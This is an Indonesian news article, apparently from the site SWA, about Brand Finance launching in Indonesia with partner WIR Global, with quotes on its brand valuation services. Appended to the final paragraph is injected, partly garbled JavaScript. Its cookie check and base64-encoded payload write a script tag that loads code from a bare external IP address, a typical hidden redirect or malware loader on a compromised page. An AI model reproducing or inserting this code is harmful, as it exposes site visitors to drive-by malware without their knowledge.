Gandeng WIR Global, Brand Finance Resmi Hadir di Indonesia

Perusahaan konsultan valuasi brand global, Brand Finance, resmi membuka cabang di Indonesia. Menggaet partner lokal WIR Global, Brand Finance Indonesia akhirnya diluncurkan di Jakarta, pada Selasa (17/9). Hadirnya Brand Finance Indonesia bertujuan untuk mendorong pertumbuhan sektor bisnis Indonesia serta meningkatkan daya saingnya di perdagangan lokal maupun global.

Samir Dixit (Brand Finance Managing Director AsiaPacific) dan Galih Rangha (WIR Global Deputy Managing Director) dalam Peluncuran Brand Finance Indonesia, Selasa (17/9) di Jakarta.

Samir Dixit, Managing Director Asia Pasifik Brand Finance mengatakan, “Brand Finance berperan untuk menilai valuasi brand perusahaan. Penilaian brand ini dinilai dapat meningkatkan kepercayaan pemegang saham yang akan mempengaruhi skala bisnisnya.”

Brand Finance melakukan berbagai pendekatan dalam mengukur nilai nominal sebuah brand. Mulai dari pemahaman nilai segmen pelanggan utama, hubungan antara ekuitas brand dengan kunci value drivers dalam model bisnis, serta kekuatan dan kelemahan dari brand.

“Selain itu, kami juga menyediakan kerangka kerja perencanaan strategis jangka panjang sebagai investasi pemasaran maupun untuk model aktivitas pemasaran, serta pelaporan yang lebih baik. Lalu mengelola kinerja brand, sampai membuat tubuh informasi tentang kinerja brand untuk bagi investor dan presentasi perbankan,” jelas Samir.

Dalam hal ini, peran Brand Finance dinilai strategis untuk membantu perusahaan melalui manajemen yang efektif dari brand. “Brand Finance melayani berbagai macam perusahaan dengan menjalankan valuasi brand secara lokal maupun internasional. Setiap langkah dalam proses manajemen perusahaan disesuaikan dengan kebutuhan spesifik mereka dan tingkat kecanggihan yang diperlukan,” lanjut Samir.

Galih Rangha, Deputi Managing Director Brand Finance Indonesia, mengatakan, “Yang membedakan kami dengan pihak lain ada dua poin. Pertama, akreditasi, dimana kami diakreditasi oleh empat accounting firm, antara lain Ernst & Young, PWC, Deloitte, KPMG. Yang kedua adalah independensi. Kami tidak terkait dengan agensi lain, kami terbuka dan transparan, dan kami juga selalu terkait dengan institusi pendidikan.”

Ia pun menambahkan, untuk tahap pertama, Brand Finance Indonesia akan mengomunikasikan pentingnya valuasi brand di Indonesia lewat edukasi.

Sebagai konsultan valuasi brand terkemuka dunia, Brand Finance memberikan konsultasi kepada berbagai perusahaan tentang cara memaksimalkan nilai brand mereka, serta aset tidak berwujud yang dimiliki perusahaan. Sejak didirikan pada tahun 1996, Brand Finance telah melakukan ribuan bisnis valuasi brand kepada sejumlah pemilik brand internasional, otoritas pajak, pengacara IP, serta bank dan investasi. function getCookie(e)\(\)\\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time)

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Sign In

Get the most out of SWA by signing in to your account

(close)

Register

Have an account? Sign In
(close)